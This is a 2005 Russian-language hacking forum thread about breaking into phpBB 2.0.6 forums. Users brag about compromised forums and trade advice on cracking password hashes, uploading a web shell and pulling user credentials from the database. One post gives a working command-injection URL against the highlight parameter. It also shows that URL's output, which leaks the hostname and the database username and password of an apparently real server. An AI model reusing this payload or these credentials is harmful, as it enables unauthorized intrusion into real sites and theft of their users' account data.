Форумы Бажный форум на phpBB 2.0.6

Discussion in 'Уязвимости CMS/форумов' started by REDACTOR.-, 13 Mar 2005.

  1. REDACTOR.-

    REDACTOR.- New Member

    Joined:
    13 Mar 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    У меня такой вопрос-->
    1.Я взломал форум на phpBB 2.0.6, там около 2700 :)
    юзверей и есть cashadmin etc.
    Что мне с этим делать? :confused:
     
  2. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    мммммм это как вопрос у меня есть компьютер и анлим что мне с этим делать?
    Ну придумай что-нибудь, поробуй перебрать хеши.
     
  3. REDACTOR.-

    REDACTOR.- New Member

    Joined:
    13 Mar 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Я уже АДМИН!!!
     
  4. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    какая радость))
     
  5. Thrasher

    Thrasher New Member

    Joined:
    11 Mar 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Привет всем!
    Взломал форум на phpbb 2.0.6 с помощью запроса
    viewtopic.php?p=123&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
    Получил вот что:
    uid=65534(nobody) gid=4294967295 ЗТХРРЩ=4294967295 Linux virtualnet.kiev.ua 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 unknown unknown GNU/Linux $dbms = 'mysql'; $dbhost = 'localhost'; $dbname = 'phpbb'; $dbuser = 'root'; $dbpasswd = '111111'; )\b#i
    Подскажите, плиз, как повысить свои права до админских или где взять хеш с логинами и паролями юзеров.
    Спасибо.
     
  6. gen0c!de

    gen0c!de New Member

    Joined:
    29 Dec 2004
    Messages:
    10
    Likes Received:
    3
    Reputations:
    1
    Залей шеллу...
     
  7. chip

    chip Banned

    Joined:
    5 Mar 2005
    Messages:
    80
    Likes Received:
    0
    Reputations:
    0
    А если я имею статус Админа, то как посмотреть пароли пользователей?
     
  8. gen0c!de

    gen0c!de New Member

    Joined:
    29 Dec 2004
    Messages:
    10
    Likes Received:
    3
    Reputations:
    1
    в db...
     
  9. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    в bd и только хэши